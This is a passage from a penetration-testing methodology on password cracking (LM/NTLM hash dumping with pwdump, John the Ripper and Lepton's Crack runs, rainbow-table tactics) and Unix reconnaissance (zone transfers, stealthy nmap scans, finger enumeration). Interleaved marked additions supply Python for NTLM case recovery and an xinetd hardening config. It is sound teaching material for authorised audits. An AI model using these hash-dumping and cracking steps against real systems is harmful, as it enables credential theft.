already used salts with DES, so it is not vulnerable to rainbow cracking.
Oechslin’s study demonstrates how it is possible to pre-compute the hashes for a given
algorithm and charset, obtaining some optimized tables which can be reasonably stored
on today’s mass storage devices, and having a good probability to retrieve quickly (in
some cases almost instantly) the password corresponding to the given hash. This is why
this technique is also called “Instant Cracking”.
There is more than one software which implements Rainbow Cracking, but a special
mention goes to Zhu Shuanglei who was the first to publish a working software (with
sources, http://www.antsight.com/zsl/rainbowcrack/). Zhu’s software (rcrack) is
configurable and slightly customizable.
At the moment, while someone is starting to sell pre-computed tables, others are offering
on-line cracking services (free and commercial).
This solution greatly eases frequent cracking tasks for PenTesters and Auditors, but its
performance is inversely proportional to hash quantity and applicable only to not-salted
hashes.
D.3.4 LC5 (Windows only, commercial)
LC5 has a nice interface and the fastest LM routines I know.
It is a Windows-only application, but it seems to run in Linux under WINE.
Most LC5 features are available in OpenSource and other free software.
D.4 CRACKING STRATEGY
Our strategy depends on our enemy and our resources. A good strategy is a good
starting point to increase the success rate. After becoming acquainted with the techniques
presented here, everyone should be able to define an appropriate strategy for each
specific case.
My generic password cracking strategy is divided into 4 steps. The goal is to prepare the
cracking environment and decide a suitable cracking tactic to get the best results as
quickly as possible.
Please note you must adapt the strategy to each specific case. Here is only a sample,
useful for academic purposes, modeled on Auditing and internal PenTesting needs.
Most external PenTests could benefit only from a subset of this strategy.
An important note: please ensure the techniques you are going to use are compatible
with your “contract” or “mandate”. Sometimes PenTests and Audits are intentionally
limited for whatever reason, management and admin fear included…
D.4.1 Information gathering
Unless we already have the admin password hash and it corresponds to “123” or
“password”, we need to gather as much information as we can about our target.
All this information should be useful at least to build a specific dictionary, and eventually
to understand more about corporate and admin habits.
Some examples of useful information:
• Users’ full names, Departments, and comments available from the server.
Unhardened Windows servers generally give away a lot of information; for
example you can start by trying GetAcct (http://www.securityfriday.com/ ).
• Accounts pertaining to system services. These accounts are often managed
with less care than personal accounts, their password is almost never changed,
they are often replicated on more domains, and sometimes they are configured
by external personnel outside the control of corporate policies.
• Security Policies (see GetAcct and any internal document).
• Cleartext and obfuscated passwords (sniffed or gathered directly from machines).
Where VNC is used, its password is often the same for a lot of computers, and
having gained user level credentials you can get VNC passwords remotely (see
RegBrws on http://www.securityfriday.com/).
• Suitable strings from network traffic (see ngrep).
• Words contained in internal documents.
D.4.2 Investigation
Operating internally, after a bit of investigation you can capture useful data from various
sources:
• Password synchronization systems in use: if any administrative password is synchronized with an IBM/370 mainframe, usually the charset is no more complex than alphanumeric!
• Admin habits in balancing security with easy access to systems (there are still admins who believe a secure password is a nuisance, most of them don't know how to build an easy yet very secure password, and maybe they use their best password with FTP and Telnet).
• Corporate choices about encrypted protocols on network devices.
• Social engineering.
• Sticky notes attached to monitors and containing passwords.
• Etc.
D.4.3 Dictionaries
After gathering as much information as you can, and after investigating the target's habits, you can build dictionaries.
Depending on the tools you will use on subsequent phases, dictionaries may have to be
sorted, without duplicates, and lower/upper case. Please refer to any updated tools
documentation about this issue.
Typical dictionaries would include:
• Small international (English) and medium local (e.g. Italian) dictionaries.
• Information gathered.
• Formatted and unformatted dates starting from 60 years ago.
• The names of soccer/football/basketball teams, the names of famous TV people.
• Users' register codes.
• Etc.
Depending on the cracking rate (type and quantity of hashes available – see above), you
may want to build two levels of dictionaries: a small one and a big one, so you can use
the first in an interactive cracking phase and, if still needed, use the other for a nightly
batch phase.
D.4.4 Building a cracking tactic
This step is the most critical. Now you have some battlefield scenario and you need to
depict the sequence of attacks.
The tactic highly depends on the type and quantity of hashes available, your available
resources to perform the task, and even the quality of analyzed passwords. It is also
fundamental to correctly evaluate how much processing time (using one or more
computers) you can dedicate to the cracking.
Expect this step to be very different each time you face a new target. After some
practice you should be able to define very good tactics for each case.
D.5 CRACKING TACTICS
I often see people asking on forums or lists: “Which is the best password cracker to get rid of this hash?”
From a professional viewpoint, I think this is the wrong question. The right question should be: “What's your cracking tactic for this type of hash, and what tools do you prefer?”.
Hints are always a useful starting point, but the final word is always up to you.
A good starting point to decide the sequence of phases is to start with the shortest phases, proceeding then with the longer ones. Phases depend highly on the available hash types and quantity.
The sample tactic shown here is modeled on LM password cracking, supposing a
number of hashes are available either by network or by downloading from a
server.
Tools used here are summarized and referenced in the “tools” section.
Before proceeding with more detail on cracking tactics, you may want to take a look at a sample LM cracking of a complex password here: http://www.nestonline.com/lcrack/index.html
D.5.1 Working Dictionary
LM passwords (or LM half passwords) found in every phase should be added to what I
call a “working dictionary”, a dictionary containing all passwords already found for the
current “job”.
At the end of each phase you should try all your hashes against this working dictionary. If you found the two halves of the same password in two different phases, this activity will merge the results.
You can use either JtR or Lepton's for this activity.
D.5.2 Dictionary
Since the first phase should be the shortest one, you will usually begin with a dictionary
crack, remembering that the cracking time directly depends on the dictionary size (and
for salted hashes it depends also on hash quantity).
Provided it supports the needed algorithm, the fastest tool here is John the Ripper.
JtR has a limitation when dealing with LM passwords: it doesn't perform useful dictionary attacks for passwords longer than 7 characters. To overcome this limitation, you can use Lepton's Crack. An LM version is in a development branch: http://www.nestonline.com/lcrack/index.html
C programmers should take a look at Lepton’s Crack “smart dictionary” mode source
code. It’s easy to modify, and you can quickly add your own dictionary “variations”.
As mentioned above, you may want to use two dictionary sets: a smaller and a bigger
one. This is particularly useful when cracking a number of salted hashes (cracking time
strongly dependent on the number of hashes), because the first dictionary set reduces
the uncracked hash quantity, hopefully obtaining a reasonable cracking time for the big
dictionary.
In some cases you may also want to automatically build some dictionaries, i.e. with
dates or specific charset defined in the corporate policy (ex. strong Windows password
filter at the server level).
While “plain” dictionary cracking has a good success rate for some targets, it is a waste
of time for targets using a strong password policy.
As it will be for subsequent phases, it is up to you to evaluate feasibility and usefulness
of this phase depending on cracking rate (hash types and hash quantity) and any
information gathered before.
Here is an example of hash downloading, dictionary cracking and proper case discovery. Comments are interleaved with the commands and their output.
Dump password hashes from server...
C:\test>pwdump3e \\10.0.0.134 >hashes.txt
pwdump3e (rev 1) by Phil Staubs, e-business technology, 23 Feb 2001
Copyright 2001 e-business technology, Inc.
[...]
Completed.
C:\test>type hashes.txt
Field layout of each line: User : SID : LM hash (1st half + 2nd half) : NTLM hash : : :
user1:1006:e52cac67419a9a224a3b108f3fa6cb6d:593cd653429408f9928045ffa1ad2443:::
User2:1012:e52cac67419a9a224a3b108f3fa6cb6d:7f48a4e017dac7b03d277f18d57b5f8c:::
Note: both users have the same LM hash and different NTLM hashes; this means the same word but with different case.
Build dictionary...
C:\test>echo password>dictionary.txt
Trying with John the Ripper...
C:\test>wjohn --format=LM --wordlist=dictionary.txt hashes.txt
Loaded 2 password hashes with no different salts (NT LM DES [32/32 BS])
PASSWOR          (user1:1)
guesses: 1 time: 0:00:00:00 100% c/s: 0.00K trying: PASSWOR
Note: only 3 out of 4 half hashes found?
Build LM input file for Lepton’s Crack...
C:\test>echo user1:e52cac67419a9a224a3b108f3fa6cb6d:::>hashesLC.txt
C:\test>echo User2:e52cac67419a9a224a3b108f3fa6cb6d:::>>hashesLC.txt
C:\test>type hashesLC.txt
user1:e52cac67419a9a224a3b108f3fa6cb6d:::
User2:e52cac67419a9a224a3b108f3fa6cb6d:::
Note: User2 hash is redundant here, it is the same as user1!
Fire up Lepton’s Crack...
C:\test>lcrack -q -m lm -xf+ -d "dictionary.txt" hashesLC.txt
xtn: initialized 'LanMan (7,7+7,14 bytes UPPERCASE pwd, libdes+)' module
dbg: loading 'hashesLC.txt'
user1:PASSWORD
User2:PASSWORD
Lapse: 0s, Checked: 1, Found: 2/6, Rate: 1 cycles/s
Note: all passwords found :-)
Build NTLM input file for Lepton’s Crack...
C:\test>echo user1:593cd653429408f9928045ffa1ad2443 >hashNTLM.txt
C:\test>echo User2:7f48a4e017dac7b03d277f18d57b5f8c>>hashNTLM.txt
C:\test>type hashNTLM.txt
user1:593cd653429408f9928045ffa1ad2443
User2:7f48a4e017dac7b03d277f18d57b5f8c
Discover proper case...
C:\test>lcrack -q -m nt4 -xb+ -g [pP][aA][sS][sS][wW][oO][rR][dD] hashNTLM.txt
xtn: initialized 'NT md4/unicode' module
dbg: loading 'hashNTLM.txt'
user1:PassWord
User2:pAsSwOrD
Lapse: 0s, Checked: 171, Found: 2/2, Rate: 1 cycles/s
Mission accomplished :-)
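The transcript above carries two lessons that are easy to check mechanically: two users sharing one LM hash typed the same word (case may differ), and once the LM half is known the NTLM case costs at most 2^n tries (the run above found both users within 171 of 256 candidates). The Python below is an added example, not part of the ISSAF text or of any tool it names. It parses pwdump-format lines (the two sample lines are constructed from the output above), reports which accounts still have an LM hash stored at all, which share one, and whose password is 7 characters or shorter (second half equal to the well-known blank-half constant), and recovers the NTLM case from the LM-cracked word. MD4 is implemented inline because hashlib does not expose it on OpenSSL 3 builds; the hardening takeaway is that disabling LM hash storage removes the shortcut entirely.

```python
import struct
from itertools import product

# Constructed sample in pwdump format (user:RID:LM hash:NTLM hash:::), copied from the
# transcript above: both users share one LM hash while their NTLM hashes differ.
PWDUMP_SAMPLE = """\
user1:1006:e52cac67419a9a224a3b108f3fa6cb6d:593cd653429408f9928045ffa1ad2443:::
User2:1012:e52cac67419a9a224a3b108f3fa6cb6d:7f48a4e017dac7b03d277f18d57b5f8c:::
"""
LM_BLANK_HALF = "aad3b435b51404ee"   # well-known LM value of an empty 7-byte half


def parse_pwdump(text):
    """Split pwdump lines into user, RID, LM hash and NTLM hash (hashes lower-cased)."""
    rows = []
    for line in text.splitlines():
        if line.strip():
            user, rid, lm, nt = line.split(":")[:4]
            rows.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return rows


def lm_findings(rows):
    """Who still has an LM hash stored, whose password is <= 7 chars, who shares a hash."""
    stored = [r["user"] for r in rows if r["lm"] != LM_BLANK_HALF * 2]
    short = [r["user"] for r in rows
             if r["lm"][16:] == LM_BLANK_HALF and r["lm"][:16] != LM_BLANK_HALF]
    groups = {}
    for r in rows:
        groups.setdefault(r["lm"], []).append(r["user"])
    shared = {h: users for h, users in groups.items() if len(users) > 1}
    return {"lm_stored": stored, "short_password": short, "shared_lm": shared}


# --- MD4 (RFC 1320) in pure Python; NTLM is MD4 over the UTF-16LE password ---
_M = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & _M


def _md4_round(fn, state, X, order, shifts, k):
    a, b, c, d = state
    for i in range(16):
        a = _rotl((a + fn(b, c, d) + X[order[i]] + k) & _M, shifts[i % 4])
        a, b, c, d = d, a, b, c          # rotate the working variables (abcd -> dabc)
    return a, b, c, d


def md4(data: bytes) -> bytes:
    msg = bytearray(data) + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        s = tuple(h)
        s = _md4_round(lambda x, y, z: (x & y) | (~x & z), s, X,
                       list(range(16)), (3, 7, 11, 19), 0)
        s = _md4_round(lambda x, y, z: (x & y) | (x & z) | (y & z), s, X,
                       [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13), 0x5A827999)
        s = _md4_round(lambda x, y, z: x ^ y ^ z, s, X,
                       [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15), 0x6ED9EBA1)
        h = [(h[i] + s[i]) & _M for i in range(4)]
    return struct.pack("<4I", *h)


def ntlm_hex(password: str) -> str:
    return md4(password.encode("utf-16-le")).hex()


def recover_case(lm_word: str, nt_hash: str):
    """LM yields the word with case erased; NTLM pins the case down in at most 2**len tries."""
    choices = [(c.lower(), c.upper()) if c.isalpha() else (c,) for c in lm_word]
    for cand in product(*choices):
        s = "".join(cand)
        if ntlm_hex(s) == nt_hash.lower():
            return s
    return None


if __name__ == "__main__":
    rows = parse_pwdump(PWDUMP_SAMPLE)
    f = lm_findings(rows)
    print("LM hash still stored for:", f["lm_stored"], "(disable LM storage on the server)")
    for lm, users in f["shared_lm"].items():
        print(f"LM {lm} shared by {users}: same text, possibly different case")
    for r in rows:                       # the LM dictionary run above gave PASSWORD for both
        print(r["user"], "->", recover_case("PASSWORD", r["nt"]))
```

Run it as a script to see the same three findings the transcript walks through by hand; `recover_case` accepts any LM-cracked word, so the same function serves passwords that contain digits or symbols (those positions contribute only one candidate each).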
D.5.3 “Quick and dirty”
Let me know if you have a better name for this phase!
Here I usually try short passwords with a relatively complex charset. Target passwords
(or password chunks) are for example: ()wn3d ws£1 .oO° etc.
This phase is particularly useful when cracking LM, because LM passwords are always
broken into two 7 bytes chunks, so there are chances you will find some “second half” of
passwords longer than 7 as well as some passwords shorter than 8.
This phase itself can be broken into sub-phases of increasing duration, for example:
1. Length = 1 to 7, charset = numeric + date separators
2. Length = 1 to 4, charset = alphanum + all symbols. For example: lcrack -l 1-4 -s " -~" (that means “the charset is from space to tilde”, 0x20..0x7E), or modifying john.conf, or building a charset for JtR.
3. Length = 5, charset = numbers and all symbols
4. Length = 5, charset = alphanum + most common symbols
5. Length = 6, charset = alphanum
6. Length = 7, charset = alpha
7. Length = 5 to 7, charset = symbols only
At this point of the tactic, each phase shouldn't take longer than a few minutes.
Remember, these are only examples useful as a starting point; I'm sure after some experimenting you will find recipes which better suit your needs.
D.5.4 “Incremental”
Dealing with dictionaries, JtR has a nice “incremental” mode which uses a dictionary for
a configurable rule-based password generation. See john.conf and any documentation
available.
At this point of our sample tactic, it could be a good time to do “incremental” cracking.
D.5.5 LM Half Passwords
At this point maybe we have some half-passwords, and maybe we note that some halves can help to deduce the other half.
For example, the LM password gr8beethoven is split into gr8beet and hoven. If you followed my “quick and dirty” example, you found the second half (hoven) at point 5, and since there aren't thousands of words ending with “hoven”, it is worth trying to guess the beginning.
We can use Lepton's here, thanks to its RegEx support. A quick search in a dictionary reveals “Beethoven” is the only word longer than 5 ending with “hoven”. Let's try with lcrack: lcrack -s " -~" -l 3 -g [*][b][e][e][t][h][o][v][e][n]
The length (parameter -l 3) refers to the variable-length part ([*]): it is 3 characters long, so the whole password will be 12 characters long. With this technique you can deduce either the second half by knowing the first half, or the first half by knowing the second half.
An example showing this technique is here: http://www.nestonline.com/lcrack/index.html
This is why I said LM passwords longer than 7 are often simpler, or at least not more complex, to crack than 7-character passwords.
Please note this phase is placed here in this example, but it makes sense to perform it whenever a phase yields “good” password halves.
D.5.6 Basic brute force attempts
When you have a lot of hashes, it is a good idea to purify our hash-pot of as many silly passwords as we can before proceeding with “instant” cracking. In fact, instant cracking time is almost directly proportional to hash quantity.
Remember, the tactic highly depends on hash types and, depending on your needs, this phase may include a brute force using an alphanumeric charset for 7-byte LM passwords. Such a crack takes roughly 4 hours on my P4-3GHz, while the same brute force using “alphanumeric + common symbols” takes a bit less than two days (a good job for a weekend!).
D.5.7 “Instant” cracking
If you have a lot of hashes, you should design the tactic to discover most
passwords before proceeding with “instant” cracking. On the other side, if you
have only one hash you may prefer to perform instant cracking in an early stage of
the tactic.
Either way, you can calculate in advance what is the number of hashes where it is
convenient to switch to brute-force instead of an instant cracking using the same
charset.
For example, suppose you test an alphanum charset with an instant cracking software, and its performance is 6 pwd/minute. If on the same PC you brute-force all alphanumeric passwords in 4 hours, in the same time you will crack 1440 (6*60*4) passwords using the instant cracker. So, in this example, if you have roughly more than 1500 passwords it is convenient to brute-force them, otherwise it is faster to do an instant cracking. This is the argument I use to decide where in the tactic I should place an instant cracking phase.
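The break-even argument above, together with the 4-hour and “a bit less than two days” figures from D.5.6, can be turned into a small planning calculator. The Python below is an added example, not the author's tooling: it derives the brute-force rate implied by the 4-hour run over 7-character alphanumeric LM halves (36 characters, since LM up-cases letters), estimates other charsets at that rate, and computes the hash count at which one brute-force run beats feeding hashes to an instant cracker one by one. The 14-symbol size taken for “common symbols” is my assumption, borrowed from the sym14 table set mentioned later on this page; with it the estimate lands at about 1.7 days, consistent with the author's figure.

```python
# Added planning helper for the brute-force vs. "instant" cracking trade-off.
ALNUM_LM = 36                # LM halves are case-insensitive: 26 letters + 10 digits
COMMON_SYMBOLS = 14          # assumption: size of the "sym14" set mentioned for rainbow tables
BENCH_HOURS_ALNUM7 = 4.0     # the page's figure: 7-char alphanumeric LM brute force on a P4-3GHz


def keyspace(min_len, max_len, charset_size):
    """Number of candidates over every length in [min_len, max_len]."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def rate_from_benchmark(charset_size=ALNUM_LM, length=7, hours=BENCH_HOURS_ALNUM7):
    """Candidates per second implied by a full brute-force run that took `hours`."""
    return keyspace(length, length, charset_size) / (hours * 3600)


def estimate_hours(min_len, max_len, charset_size, rate_per_second):
    """Wall-clock hours for an exhaustive run of that keyspace at the given rate."""
    return keyspace(min_len, max_len, charset_size) / rate_per_second / 3600


def break_even_hashes(instant_rate_per_minute, brute_force_hours):
    """Hash count at which one brute-force run and one-by-one instant cracking take equal time."""
    return instant_rate_per_minute * 60 * brute_force_hours


def choose_phase(hash_count, instant_rate_per_minute, brute_force_hours):
    """'brute' when more hashes remain than the break-even count, otherwise 'instant'."""
    threshold = break_even_hashes(instant_rate_per_minute, brute_force_hours)
    return "brute" if hash_count > threshold else "instant"


if __name__ == "__main__":
    rate = rate_from_benchmark()
    print(f"implied rate: {rate:,.0f} candidates/s")
    days = estimate_hours(7, 7, ALNUM_LM + COMMON_SYMBOLS, rate) / 24
    print(f"7-char alphanum + {COMMON_SYMBOLS} symbols: {days:.2f} days")
    print("break-even at 6 pwd/min vs 4 h brute force:", break_even_hashes(6, 4), "hashes")
    for n in (100, 1500, 5000):
        print(f"{n:5d} hashes -> {choose_phase(n, 6, 4)}")
```

Swap in your own benchmark (charset, length, measured hours) and instant-cracker rate; the functions are independent of LM apart from the 36-character default.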
Every now and then someone puts Rainbow Tables online, and it's normal to expect others will be more or less freely available soon. Jérôme Athias kindly put online freely downloadable LM rainbow tables for alphanum+sym32 with an “honest” success rate (Jérôme declares approximately 60%) here: http://wired.s6n.com/files/jathias/ . With such tables the cracking performance I measured is roughly 3 pwd/hour on a P4 (Gentoo Linux). Please note the charset used by Jérôme includes the Euro symbol (€). I didn't experiment deeply with those tables, but the Euro symbol is Unicode and it causes the LM hash to disappear (only the NTLM hash remains), so I think it is at least a (little) waste of time (if not worse, because the space symbol is placed after the Euro in the charset and I am curious to debug rcrack to see what the real effect of this on the loaded charset is).
Having more than one Rainbow Table set already available (for example alphabetic, alphanumeric, alphanum+sym14 and alphanum+sym32), and depending on the number of hashes remaining, you may want to insert more instant cracking phases, especially after the “quick and dirty” and “incremental” phases.
D.5.8 Advanced Brute-force attempts
After the final Rainbow cracking phase, the only thing you can do is go on with brute-forcing.
Here you have two options: do a generic brute force, which needs a lot of time, or try some alchemy based on previous results.
My preferred tool for this alchemy is Lepton's Crack, thanks to its RegEx support. Here are some attempts you can experiment with:
• If you eavesdropped on an admin while typing the password, you can try to build some RegEx based on the supposed password beginning or ending.
• Supposing you didn't find the password with the above-mentioned Athias Rainbow Tables, you can 90% assume the password isn't alphanum+sym32, so it probably contains one (or more) characters outside that charset. Start trying with some RegEx containing one keyboard symbol not in sym32 (accented vowels or special characters if in Europe, other less common symbols), and then try with symbols not included on keyboards.
This is the time to unleash your fantasy, or your social engineering skills ;-)
D.6 FINAL NOTES
During the review of this document someone asked me: “If this document is aimed at
beginners to intermediate professionals, how do you define an advanced professional
password cracker?”
Well, I think such a professional is one who builds the tools he needs himself. Sure, not always from scratch; there is good Open Source out there!
By building your own tools, you can solve cracking puzzles others can't. For me it has been every time an interesting challenge and a way to learn more and more...
Piero Brunati
E UNIX /LINUX SYSTEM SECURITY ASSESSMENT
Description
UNIX systems are attacked more often than Windows systems. There are certain reasons for this:
• Open Source: as UNIX (especially open source UNIX-like systems) is open source, more bugs are found in the source code and exploited. The advantage of open source is that it keeps UNIX safe, as the source code is tested many times, and UNIX administrators are more security conscious and patch the system as soon as a bug is released. If no patch is available, it is probably ready in a couple of hours, or sometimes less.
• Availability: there are more GNU/Linux and UNIX boxes connected to the internet.
Objective
• To follow a structured approach for Unix system penetration/audit
• To gain initial access and then escalate privileges on systems
• To go beyond root and spread the attack further to other systems or levels
• To understand Unix security issues and safeguard methods
Expected Result[s]
• List of live hosts
• Processes running on hosts
• List of users/shares
• List of networks, hosts and their relations
• Version of kernel used in operating systems and their patch level
• Vendor of operating system
• Vendor of third party and/or additional software
• List of vulnerabilities
• List of compromised hosts
E.1 METHODOLOGY
There are no methodical procedures to gain root access to a system. However, vulnerabilities have existed that allowed remote root access with the simple execution of an exploit. Anyway, if a system had this vulnerability, it would be easily spotted at first hand if it was well known, and closed. But an attacker would try to get in via other means, or vulnerabilities, and our job is to try to secure the box/network fully, not only its “remote root” vulnerabilities.
However, we can provide you with a basic idea or guide that you could follow, like this one:
1. Identify Live Hosts
2. Identify Ports and Services
3. Enumeration Procedure
   a. Identify Users
   b. Identify e-Mail accounts
   c. Identify Administrators
   d. Identify Networks and Domains
4. Examine Common Protocols (for probable future covert channels operation)
5. Examine Unix
   • Remote Attacks
      a. Password Attacks
      b. Denial of Service Attacks (do not do this unless explicitly allowed)
      c. RPC Attacks
      d. Buffer overflow Attacks
      e. Heap overflow Attacks
      f. Integer overflow Attacks
      g. Format string Attacks
      h. Web Server Attacks
      i. Mail Server Attacks
      j. X11 insecurities
      k. NFS Share Attacks
   • Local Attacks
      a. File and Directory Permission Attacks
      b. Symlink attacks
      c. Race condition attacks
      d. System call attacks
      e. Key logger attacks
      f. Booting from another operating system
E.2 IDENTIFY LIVE HOSTS
Being able to map the network of the target, both public and private, will provide us with the basic elements to initiate a full attack, and to organize it properly. One needs to split among servers, desktops and devices (like routers, switches, printers, etc). It is always important to remember that we must set an objective and use the resources and information we find along the way to accomplish it. Among the different approaches to live host enumeration we can use: Passive Scans (which additionally provide information on how much certain servers are used) and Active Scans. Let's start with the latter:
Active Scans
Specifically, the word "Active" denotes actions that, when done, make the target receive packets generated, directly or indirectly, by us.
Active Scans are those where we use tools like NMap (www.insecure.org/nmap) to scan a range of IP addresses with different scanning methods. Of course, you may know one IP address and/or hostname for your target. We can use host/nslookup and/or dig to find additional hosts in the target's network. Let's take as an example a target whose "NS" records point to a vulnerable DNS server:
Target: somesite.dom
nslookup -type=NS somesite.dom will provide us with the NS records for somesite.dom.
The NS records tell us which are the (canonical) addresses of the nameservers somesite.dom uses to store its DNS information. In case we get ns1.provider.net and ns2.provider.net as nameservers, we need to get their IP addresses (which can be multiple if a round-robin A record is used for each name), so we can do a zone transfer (AXFR) against those nameservers, the authoritative ones for somesite.dom, and get a listing of all DNS records of somesite.dom:
nslookup -type=A ns1.provider.net
Now we have the IP address(es) for ns1.provider.net. Let's use that on a host command
to do an AXFR transfer:
host -l somesite.dom IP_OF_NS1_PROVIDER_NET
If the nameserver AND firewall are both misconfigured (that is, no access control rules for zone transfers are set on the nameserver(s) and no matching rules are set on the firewall for the filtering of port 53/tcp, the one used for zone transfers), then we shall get the aforementioned listing. The operation can be repeated against the other nameservers, and the results saved in separate files. This way we may, additionally, discover if the nameserver manager(s) have a proper, redundant nameserver setup.
It is a good idea to try to discover what the system administrators are good at. This way, we can better plan the attack.
On the other side, quite a typical situation is that an enterprise usually has more than one public IP address, and usually the provider assigns a block (technically speaking, a subnet with a prefix length of 24 bits or less). For example, if you have the company website at "www.somesite.dom", and it corresponds to one public IP address x.y.z.204, then you should traceroute to it and see which is the hop previous to the last one. If it is from the same subnet, then it may probably be the company router and/or firewall. An nmap operating system scan (nmap's -O option) will prove helpful. Additionally, the difference between the web server's IP address and the router's may provide an idea of how big the assigned subnet is. A service scan, banner gathering and port 80 browsing on the other IPs in or near that range may help you assign the IPs to your target's IP pool.
As you can see, the Identify Live Hosts section does sometimes overlap with the Identify
Ports and Services. Active scans are usually like this.
Passive Scans
If you are inside your target's network, in the same switch or hub, you may be able to make use of the passive scan technique, where no packet is sent to the network, but your network adapter, in combination with a good sniffer like ettercap, will take the packets that your network adapter reads, thus showing the IP addresses found and optionally OS-fingerprinting them. It uses the "legal" traffic the host sees to make the scan, thus being "passive".
We will talk more about sniffers and such ahead in this document.
E.3 IDENTIFY PORTS AND SERVICES
We are all used to matching ports and services as generally used. We know SMTP runs on port 25, SSH on port 22, HTTP on port 80, and so on. But some administrators, who take the Security through Obscurity approach (not a good idea), usually move non-internet-vital services, like ssh, to other ports. That's why it is usually important to do a two-stage port scan:
In the first scan, we search for common ports, for example, using nmap's -F switch. If we
find or sense that more services should probably be running, we may start a second
(and maybe subsequent) scans, to map the whole port range (tcp and udp), from 1 to
65535. Nmap's -sV switch will additionally gather banners and do service detection over
non-standard ports, and will provide a piece of read bytes from the connection when it
cannot determine the service running on it. Please, try out Nmap's -T parameter, which
allows you to slow down a scan. Of course, it will take longer to finish, but it'll be
stealthier. Additionally, the -f parameter, to use packet fragmentation during the scan,
will help with some IDSes.
The most important aspect of port and service scanning relates to the knowledge of the system administrator we get. You can think of an equation where you fill in the "unnecessary services open to the world" and "old software versions" values. It is important to understand or get to know the sysadmin: it will prove helpful when you get into the system. More on this later…
E.4 ENUMERATION ATTACK
Enumeration attacks are used to get information from the related service. For example,
from NetBIOS we can get Shares, computer names, server names, OS release, etc.
From finger, we can get usernames and how long and how much they work on the
system. We will provide examples of different types of enumeration.
E.4.1 Identify Users
Description
Example methodology for User Enumeration
Objective
To take advantage of misconfigurations on different services/protocols (see Process) to get deeper knowledge of the user base, and probably to know if accounts apart from root are used at all. Many times GNU+Linux-based boxes are set up as firewalls, VPN servers or gateways, so local users are not much used.
Expected Result[s]
Usernames, Email Addresses, login/logout time, Plan files, Default Shell.
Pre-Requisite
Ports of services in Process should be open from our perspective.
Process
• finger
• rwho
• rusers
• SMTP
• rpcinfo
E.4.1.1 USER IDENTIFICATION: FINGER
Description
Finger services expose system user information to any entity on the network. Finger works on port 79 TCP/UDP by default.
It helps an attacker to guess user accounts by guessing usernames.
It informs an attacker whether a user has new email.
It helps an attacker to guess the operating system.
Options:
#finger -l @target.com
#finger -l root@target.com
#finger -l 'a b c d e f g h'@target.com (Solaris Vulnerability)
Examples/Results
# finger root@target.com
Login: root
Name: root
Directory: /root
Shell: /bin/bash
On since Mon Oct 13 22:06 (IST) on tty1 54 seconds idle
On since Mon Oct 13 23:53 (IST) on tty2 17 minutes 4 seconds idle
On since Mon Oct 13 23:39 (IST) on tty3 4 hours 56 minutes idle
On since Mon Oct 13 23:39 (IST) on tty4 4 hours 56 minutes idle
On since Mon Oct 13 22:06 (IST) on :0 (messages off)
On since Mon Oct 13 22:34 (IST) on pts/0 from :0.0
50 minutes 6 seconds idle
On since Tue Oct 14 04:20 (IST) on pts/2 from 203.124.156.112
30 minutes 15 seconds idle
On since Tue Oct 14 00:46 (IST) on pts/5 from :0.0
1 hour 7 minutes idle
Mail last read Tue Oct 14 04:04 2003 (IST)
No Plan.
# finger @target.com
Login: broot
Name: Mr. Root
Directory: /root
Shell: /bin/bash
Last login Wed Jan 30 09:43 2002 (CET) on console
No Plan.
Login: nonroot
Name: Non-root root user for NFS
Directory: /nonexistent
Shell: nologin
Never logged in.
No Plan.
Login: root
Name: Mr. Root
Directory: /root
Shell: /bin/sh
Last login Wed Jan 30 09:43 2002 (CET) on console
No Plan.
# finger 'a b c d e f g h'@www.sun-target.com
Analysis/Conclusion/Observation
• Finger daemon is running on the target system
• root user is logged into the system
Countermeasures
• Use xinetd/tcpwrappers as per your need to control access to services based on the following:
  • Host/IP
  • Users
  • User Group
  • Access Time
• Strongly recommended to block the port on the external router/firewall.
• Disable the service if not used from /etc/inetd.conf and restart the inetd process. This is only for Sun OS and some flavors of Linux.
• Disable the service if not used from /etc/xinetd.conf (or delete the file finger from xinetd.d) and restart the xinetd process.
• Run the service on a non-standard port from /etc/services. Be aware that there are administrative problems with this: the client needs to run the service on the same port as the server.
• Give access on a need-to-know basis on specific interfaces using xinetd/tcpwrappers or any firewall (iptables).
• For the Solaris vulnerability apply the relevant patches from Sun Microsystems: http://archives.neohapsis.com/archives/vulnwatch/2001-q4/0016.html
Remarks
By setting up a fake finger daemon, if finger is not really needed, we can provide attackers with false information, and additionally we could redirect their attention to another host, like a honeypot.
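As an added illustration of the Host/IP, interface and access-time controls listed in the countermeasures above (the same list is repeated for rwho and rusers), here is a hardened xinetd entry for finger together with matching tcpwrappers rules. This is a constructed example, not a file from the ISSAF text: the subnet, interface address and hours are placeholders, and xinetd cannot restrict by user or group, so those two items need the daemon's own controls or a firewall. The first choice remains disable = yes; the rest applies only where finger must stay on.

```conf
# /etc/xinetd.d/finger  (constructed example; distribution defaults ship disable = yes)
service finger
{
    # "yes" switches the service off entirely, which is the recommended state
    disable         = no
    socket_type     = stream
    protocol        = tcp
    wait            = no
    user            = nobody
    server          = /usr/sbin/in.fingerd
    # Host/IP: only the internal management subnet (placeholder range)
    only_from       = 192.168.0.0/24
    # Interface: listen on the internal address only, never on the external one (placeholder)
    bind            = 192.168.0.1
    # Access Time: office hours only
    access_times    = 08:00-18:00
    # log refused connections so probes from outside the allowed set are visible
    log_type        = SYSLOG authpriv info
    log_on_failure  += HOST
}

# /etc/hosts.deny   (tcpwrappers: default deny for the finger daemon)
in.fingerd : ALL

# /etc/hosts.allow  (tcpwrappers: same management subnet, placeholder range)
in.fingerd : 192.168.0.0/255.255.255.0
```

After editing, restart xinetd and confirm from a host outside the allowed range that the connection is refused and a refusal is logged; the rwho and rusers sections list the same controls and take the same shape of configuration.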
E.4.1.2 USER IDENTIFICATION: RWHO
Description
This is similar to finger. The attack is only for the local segment. It is a remote version of the who command: a combination of who information from all of the systems in the local network running the rwho server (daemon). It works on UDP port 513.
Steps to be performed
#rwho -a wally becky smith
